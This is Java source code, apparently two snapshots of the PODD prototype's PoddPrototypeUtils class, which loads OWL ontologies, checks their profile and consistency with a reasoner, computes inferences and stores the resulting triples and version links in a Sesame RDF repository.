nextPoddArtifactGraph) { this.manager = nextManager; this.owlProfile = nextOwlProfile; this.reasonerFactory = nextReasonerFactory; this.schemaGraph = nextSchemaGraph; this.artifactGraph = nextPoddArtifactGraph; } /** * Checks the consistency of the ontology and returns the instance of OWLReasoner that was used * to check the consistency. * * @param nextOntology * The ontology to check for consistency. * @return An instance of OWLreasoner that was used to check the consistency.s * @throws Exception */ public OWLReasoner checkConsistency(final OWLOntology nextOntology) throws Exception { final OWLProfile nextProfile = OWLProfileRegistry.getInstance().getProfile(this.owlProfile); Assert.assertNotNull("Could not find profile in registry: " + this.owlProfile.toQuotedString(), nextProfile); final OWLProfileReport profileReport = nextProfile.checkOntology(nextOntology); if(!profileReport.isInProfile()) { this.log.error("Bad profile report count: {}", profileReport.getViolations().size()); this.log.error("Bad profile report: {}", profileReport); } Assert.assertTrue("Schema Ontology was not in the given profile: " + nextOntology.getOntologyID().toString(), profileReport.isInProfile()); // create an OWL Reasoner using the Pellet library and ensure that the reasoner thinks the // ontology is consistent so far // Use the factory that we found to create a reasoner over the ontology final OWLReasoner nextReasoner = this.reasonerFactory.createReasoner(nextOntology); // Test that the ontology was consistent with this reasoner // This ensures in the case of Pellet that it is in the OWL2-DL profile Assert.assertTrue("Ontology was not consistent: " + nextOntology.getOntologyID().toString(), nextReasoner.isConsistent()); return nextReasoner; } /** * Computes the inferences using the given reasoner, which has previously been setup based on an * ontology. * * @param nextReasoner * The reasoner to use to compute the inferences. * @param inferredOntologyID * The OWLOntologyID to use for the inferred ontology. This must be unique and not * previously used in either the repository or the OWLOntologyManager * @return An OWLOntology instance containing the axioms that were inferred from the original * ontology. * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public OWLOntology computeInferences(final OWLReasoner nextReasoner, final OWLOntologyID inferredOntologyID) throws ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { nextReasoner.precomputeInferences(InferenceType.CLASS_HIERARCHY); final InferredOntologyGenerator iog = new InferredOntologyGenerator(nextReasoner); final OWLOntology nextInferredAxiomsOntology = this.manager.createOntology(inferredOntologyID); iog.fillOntology(this.manager, nextInferredAxiomsOntology); return nextInferredAxiomsOntology; } /** * Dump the triples representing a given ontology into a Sesame Repository. * * @param nextOntology * The ontology to dump into the repository. * @param nextRepositoryConnection * The repository connection to dump the triples into. * @throws IOException * @throws RepositoryException */ public void dumpOntologyToRepository(final OWLOntology nextOntology, final RepositoryConnection nextRepositoryConnection) throws IOException, RepositoryException { try { // Create an RDFHandler that will insert all triples after they are emitted from OWLAPI // into a single context in the Sesame Repository final RDFInserter repositoryHandler = new RDFInserter(nextRepositoryConnection); repositoryHandler.enforceContext(nextOntology.getOntologyID().getVersionIRI().toOpenRDFURI()); // Render the triples out from OWLAPI into a Sesame Repository final RioRenderer renderer = new RioRenderer(nextOntology, this.manager, repositoryHandler, null, nextOntology.getOntologyID() .getVersionIRI().toOpenRDFURI()); renderer.render(); // Commit the current repository connection nextRepositoryConnection.commit(); } catch(final RepositoryException e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * Generates a unique inferred ontology ID based on the original ontology ID version IRI. * * Both ontology IRI and version IRI for the resulting ontology ID are the same to ensure * consistency. * * @param originalOntologyID * The original ontology ID to use for naming the inferred ontology. * @return An instance of OWLOntologyID that can be used to name an inferred ontology. */ public OWLOntologyID generateInferredOntologyID(final OWLOntologyID originalOntologyID) { return new OWLOntologyID(IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI()), IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI())); } /** * Loads an ontology from a classpath resource, renames the ontology using the given * OWLOntologyID, checks the consistency of the ontology, infers statements from the ontology, * and stores the inferred statements. * * <br /> * * The given OWLOntologyID will be assigned to the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI in the given OWLOntologyID must be unique for this * process to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final OWLOntologyID newOWLOntologyID, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); // rename the ontology // This step is necessary for cases where the loaded ontology either does not have an // owl:versionIRI statement, or the versionIRI will not be unique in the repository. // IMPORTANT NOTE: // The version IRI must be unique in the manager before this step or the load will fail due // to the ontology already existing! // FIXME: To get around this we would need to load the ontology into memory as RDF // statements and modify it before loading it out of the in-memory ontology, which is very // possible... this.manager.applyChange(new SetOntologyID(nextOntology, newOWLOntologyID)); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a classpath resource, checks the consistency of the ontology, infers * statements from the ontology, and stores the inferred statements. * * <br /> * * The ontology IRI and version IRI are taken from inside the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI of the loaded ontology must be unique for this process * to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a Sesame RepositoryConnection, given an optional set of contexts. * * @param conn * The Sesame RepositoryConnection object to use when loading the ontology. * @param contexts * An optional varargs array of contexts specifying the contexts to use when loading * the ontology. If this is missing the entire repository will be used. * @return An OWLOntology instance populated with the triples from the repository. * @throws Exception */ public OWLOntology loadOntology(final RepositoryConnection conn, final Resource... contexts) throws Exception { final RioMemoryTripleSource tripleSource = new RioMemoryTripleSource(conn.getStatements(null, null, null, true, contexts)); tripleSource.setNamespaces(conn.getNamespaces()); final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(tripleSource); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads an ontology from a Java Resource on the classpath. This is useful for loading test * resources. * * NOTE: We currently assume that the ontology will be in RDF/XML. Outside of the prototype we * cannot make this assumption as any RDF or OWL format may be used. * * @param ontologyResource * The classpath location of the test resource to load. * @return An OWLOntology instance populated with the triples from the classpath resource. * @throws Exception */ public OWLOntology loadOntology(final String ontologyResource) throws Exception { final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(new StreamDocumentSource(this.getClass() .getResourceAsStream(ontologyResource), new RDFXMLOntologyFormatFactory())); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads a PODD Artifact from the given classpath resource into the database and into the * OWLOntologyManager. * * This includes verifying that it fits with the expected profile, and verifying that it is * consistent with the configured reasoner. * * @param artifactResourcePath * @param nextRepositoryConnection * @return * @throws Exception */ public InferredOWLOntologyID loadPoddArtifact(final String artifactResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception { // 1. Create permanent identifiers for any impermanent identifiers in the object... // FIXME: May need to load the triples into a temporary location to rewrite the impermanent // identifiers before loading it into the OWLOntologyManager this.log.info("Loading podd artifact from: {}", artifactResourcePath); final OWLOntology nextOntology = this.loadOntology(artifactResourcePath); // 2. Validate the object in terms of the OWL profile // 3. Validate the object using a reasoner this.log.info("Checking consistency of podd artifact"); final OWLReasoner reasoner = this.checkConsistency(nextOntology); // 4. Store the object this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); // 5. Infer extra statements about the object using a reasoner this.log.info("Computing inferences for podd artifact"); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository // 6. Store the inferred statements this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // 7. Update the PODD Artifact management graph to contain the latest // update the link in the PODD Artifact management graph this.updateCurrentManagedPoddArtifactOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Removes the PODD Artifact from the OWLOntologyManager. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param poddArtifact * The InferredOWLOntologyID of the PODD Artifact to remove */ public void removePoddArtifactFromManager(final InferredOWLOntologyID poddArtifact) { Assert.assertTrue(this.manager.contains(poddArtifact)); this.removePoddArtifactFromManager(poddArtifact.getBaseOWLOntologyID(), poddArtifact.getInferredOWLOntologyID()); } /** * Removes the PODD Artifact from the OWLOntologyManager using two different OWLOntologyID * references for the base and inferred ontologies respectively. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param baseOntologyID * The base OWLOntologyID of the Artifact to be removed. * @param inferredOntologyID * The inferred OWLOntologyID of the Artifact to be removed. */ public void removePoddArtifactFromManager(final OWLOntologyID baseOntologyID, final OWLOntologyID inferredOntologyID) { Assert.assertTrue(this.manager.contains(baseOntologyID)); Assert.assertTrue(this.manager.contains(inferredOntologyID)); this.manager.removeOntology(baseOntologyID); Assert.assertFalse(this.manager.contains(baseOntologyID)); this.manager.removeOntology(inferredOntologyID); Assert.assertFalse(this.manager.contains(inferredOntologyID)); } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. * @throws RepositoryException */ public void updateCurrentManagedPoddArtifactOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.artifactGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.artifactGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.artifactGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.artifactGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final RepositoryException e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. * @throws RepositoryException */ public void updateCurrentManagedSchemaOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.schemaGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.schemaGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.schemaGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.schemaGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final RepositoryException e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } }
podd-prototype/src/main/java/com/github/podd/prototype/PoddPrototypeUtils.java
/** * */ package com.github.podd.prototype; import java.io.IOException; import org.junit.Assert; import org.openrdf.model.Resource; import org.openrdf.model.URI; import org.openrdf.model.impl.ValueFactoryImpl; import org.openrdf.model.vocabulary.OWL; import org.openrdf.model.vocabulary.RDF; import org.openrdf.repository.RepositoryConnection; import org.openrdf.repository.RepositoryException; import org.openrdf.repository.util.RDFInserter; import org.semanticweb.owlapi.formats.RDFXMLOntologyFormatFactory; import org.semanticweb.owlapi.io.StreamDocumentSource; import org.semanticweb.owlapi.model.IRI; import org.semanticweb.owlapi.model.OWLOntology; import org.semanticweb.owlapi.model.OWLOntologyChangeException; import org.semanticweb.owlapi.model.OWLOntologyCreationException; import org.semanticweb.owlapi.model.OWLOntologyID; import org.semanticweb.owlapi.model.OWLOntologyManager; import org.semanticweb.owlapi.model.SetOntologyID; import org.semanticweb.owlapi.profiles.OWLProfile; import org.semanticweb.owlapi.profiles.OWLProfileRegistry; import org.semanticweb.owlapi.profiles.OWLProfileReport; import org.semanticweb.owlapi.reasoner.InconsistentOntologyException; import org.semanticweb.owlapi.reasoner.InferenceType; import org.semanticweb.owlapi.reasoner.OWLReasoner; import org.semanticweb.owlapi.reasoner.OWLReasonerFactory; import org.semanticweb.owlapi.reasoner.ReasonerInterruptedException; import org.semanticweb.owlapi.reasoner.TimeOutException; import org.semanticweb.owlapi.rio.RioMemoryTripleSource; import org.semanticweb.owlapi.rio.RioRenderer; import org.semanticweb.owlapi.util.InferredOntologyGenerator; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * A selection of utilities used to create the prototype. * * @author Peter Ansell [email protected] * */ public class PoddPrototypeUtils { /** * This URI is not currently in the Sesame OWL namespace, so we create a constant here as it is * vital to our strategy. */ public static final URI OWL_VERSION_IRI = ValueFactoryImpl.getInstance().createURI(OWL.NAMESPACE, "versionIRI"); /** * The OMV vocabulary defines a property for the current version of an ontology, so we are * reusing it here. */ public static final URI OMV_CURRENT_VERSION = ValueFactoryImpl.getInstance().createURI( "http://omv.ontoware.org/ontology#", "currentVersion"); /** * Creating a property for PODD to track the currentInferredVersion for the inferred axioms * ontology when linking from the ontology IRI. */ public static final URI PODD_BASE_CURRENT_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "currentInferredVersion"); /** * Creating a property for PODD to track the inferredVersion for the inferred axioms ontology of * a particular versioned ontology. */ public static final URI PODD_BASE_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "inferredVersion"); /** * An arbitrary prefix to use for automatically assigning ontology IRIs to inferred ontologies. * There are no versions delegated to inferred ontologies, and the ontology IRI is generated * using the version IRI of the original ontology, which must be unique. */ private static final String INFERRED_PREFIX = "urn:podd:inferred:ontologyiriprefix:"; private final Logger log = LoggerFactory.getLogger(this.getClass()); /** * The manager that will be used to manage the Schema Ontologies. * * TODO: Decide how to manage PODD Artifact ontologies that will typically have smaller * lifetimes than Schema Ontologies which will stay in the manager for the lifetime of the * manager, until the next shutdown or maintenance period when they may be changed. PODD * Artifact ontologies may import Schema Ontologies so their manager needs to be able to access * the list of Schema Ontologies. However, PODD Artifact ontologies must not stay in the manager * for long periods of time or they will cause unsustainable memory growth, particularly for * large ontologies with many versions. * * TODO: How does an edit conflict resolution strategy work in relation to this manager. * Ideally, we should also only be storing the latest version of a PODD Artifact in the manager. * If we are performing edit conflict resolution based solely on RDF triples and not OWL Axioms, * then we may be able to perform the diff externally. See the Protege OWL Diff code for * examples of how to diff ontologies. */ private OWLOntologyManager manager; /** * A factory for producing reasoners that are suitable according to owlProfile. */ private OWLReasonerFactory reasonerFactory; /** * The graph used to manage Schema Ontologies. This is distinct from the graph used to manage * PODD Artifacts. */ private URI schemaGraph; /** * The graph used to manage PODD Artifacts. This is distinct from the graph used to manage * Schema Ontologies. */ private URI artifactGraph; /** * The OWLProfile that matches the reasoners produced by the reasonerFactory. This enables a * faster pre-reasoner check to very that the ontology is in the profile before attempting to * reason over the entire ontology. */ private IRI owlProfile; /** * * @param nextManager * The OWLOntologyManager instance that will be used to store ontologies in memory. * @param nextOwlProfile * The IRI of the OWL Profile that matches the reasoner factory, and will be used to * check for basic consistency before using the reasoner. * @param nextReasonerFactory * The reasoner factory that will be used to create reasoners for consistency checks * and for inferring extra triples. * @param nextSchemaGraph * The Graph URI that will be used for storing the schema ontology management * statements. * @param nextPoddArtifactGraph * TODO * */ public PoddPrototypeUtils(final OWLOntologyManager nextManager, final IRI nextOwlProfile, final OWLReasonerFactory nextReasonerFactory, final URI nextSchemaGraph, final URI nextPoddArtifactGraph) { this.manager = nextManager; this.owlProfile = nextOwlProfile; this.reasonerFactory = nextReasonerFactory; this.schemaGraph = nextSchemaGraph; this.artifactGraph = nextPoddArtifactGraph; } /** * Checks the consistency of the ontology and returns the instance of OWLReasoner that was used * to check the consistency. * * @param nextOntology * The ontology to check for consistency. * @return An instance of OWLreasoner that was used to check the consistency.s * @throws Exception */ public OWLReasoner checkConsistency(final OWLOntology nextOntology) throws Exception { final OWLProfile nextProfile = OWLProfileRegistry.getInstance().getProfile(this.owlProfile); Assert.assertNotNull("Could not find profile in registry: " + this.owlProfile.toQuotedString(), nextProfile); final OWLProfileReport profileReport = nextProfile.checkOntology(nextOntology); if(!profileReport.isInProfile()) { this.log.error("Bad profile report count: {}", profileReport.getViolations().size()); this.log.error("Bad profile report: {}", profileReport); } Assert.assertTrue("Schema Ontology was not in the given profile: " + nextOntology.getOntologyID().toString(), profileReport.isInProfile()); // create an OWL Reasoner using the Pellet library and ensure that the reasoner thinks the // ontology is consistent so far // Use the factory that we found to create a reasoner over the ontology final OWLReasoner nextReasoner = this.reasonerFactory.createReasoner(nextOntology); // Test that the ontology was consistent with this reasoner // This ensures in the case of Pellet that it is in the OWL2-DL profile Assert.assertTrue("Ontology was not consistent: " + nextOntology.getOntologyID().toString(), nextReasoner.isConsistent()); return nextReasoner; } /** * Computes the inferences using the given reasoner, which has previously been setup based on an * ontology. * * @param nextReasoner * The reasoner to use to compute the inferences. * @param inferredOntologyID * The OWLOntologyID to use for the inferred ontology. This must be unique and not * previously used in either the repository or the OWLOntologyManager * @return An OWLOntology instance containing the axioms that were inferred from the original * ontology. * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public OWLOntology computeInferences(final OWLReasoner nextReasoner, final OWLOntologyID inferredOntologyID) throws ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { nextReasoner.precomputeInferences(InferenceType.CLASS_HIERARCHY); final InferredOntologyGenerator iog = new InferredOntologyGenerator(nextReasoner); final OWLOntology nextInferredAxiomsOntology = this.manager.createOntology(inferredOntologyID); iog.fillOntology(this.manager, nextInferredAxiomsOntology); return nextInferredAxiomsOntology; } /** * Dump the triples representing a given ontology into a Sesame Repository. * * @param nextOntology * The ontology to dump into the repository. * @param nextRepositoryConnection * The repository connection to dump the triples into. * @throws IOException * @throws RepositoryException */ public void dumpOntologyToRepository(final OWLOntology nextOntology, final RepositoryConnection nextRepositoryConnection) throws IOException, RepositoryException { try { // Create an RDFHandler that will insert all triples after they are emitted from OWLAPI // into a single context in the Sesame Repository final RDFInserter repositoryHandler = new RDFInserter(nextRepositoryConnection); repositoryHandler.enforceContext(nextOntology.getOntologyID().getVersionIRI().toOpenRDFURI()); // Render the triples out from OWLAPI into a Sesame Repository final RioRenderer renderer = new RioRenderer(nextOntology, this.manager, repositoryHandler, null, nextOntology.getOntologyID() .getVersionIRI().toOpenRDFURI()); renderer.render(); // Commit the current repository connection nextRepositoryConnection.commit(); } catch(final Exception e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * Generates a unique inferred ontology ID based on the original ontology ID version IRI. * * Both ontology IRI and version IRI for the resulting ontology ID are the same to ensure * consistency. * * @param originalOntologyID * The original ontology ID to use for naming the inferred ontology. * @return An instance of OWLOntologyID that can be used to name an inferred ontology. */ public OWLOntologyID generateInferredOntologyID(final OWLOntologyID originalOntologyID) { return new OWLOntologyID(IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI()), IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI())); } /** * Loads an ontology from a classpath resource, renames the ontology using the given * OWLOntologyID, checks the consistency of the ontology, infers statements from the ontology, * and stores the inferred statements. * * <br /> * * The given OWLOntologyID will be assigned to the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI in the given OWLOntologyID must be unique for this * process to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final OWLOntologyID newOWLOntologyID, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); // rename the ontology // This step is necessary for cases where the loaded ontology either does not have an // owl:versionIRI statement, or the versionIRI will not be unique in the repository. // IMPORTANT NOTE: // The version IRI must be unique in the manager before this step or the load will fail due // to the ontology already existing! // FIXME: To get around this we would need to load the ontology into memory as RDF // statements and modify it before loading it out of the in-memory ontology, which is very // possible... this.manager.applyChange(new SetOntologyID(nextOntology, newOWLOntologyID)); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a classpath resource, checks the consistency of the ontology, infers * statements from the ontology, and stores the inferred statements. * * <br /> * * The ontology IRI and version IRI are taken from inside the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI of the loaded ontology must be unique for this process * to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a Sesame RepositoryConnection, given an optional set of contexts. * * @param conn * The Sesame RepositoryConnection object to use when loading the ontology. * @param contexts * An optional varargs array of contexts specifying the contexts to use when loading * the ontology. If this is missing the entire repository will be used. * @return An OWLOntology instance populated with the triples from the repository. * @throws Exception */ public OWLOntology loadOntology(final RepositoryConnection conn, final Resource... contexts) throws Exception { final RioMemoryTripleSource tripleSource = new RioMemoryTripleSource(conn.getStatements(null, null, null, true, contexts)); tripleSource.setNamespaces(conn.getNamespaces()); final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(tripleSource); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads an ontology from a Java Resource on the classpath. This is useful for loading test * resources. * * NOTE: We currently assume that the ontology will be in RDF/XML. Outside of the prototype we * cannot make this assumption as any RDF or OWL format may be used. * 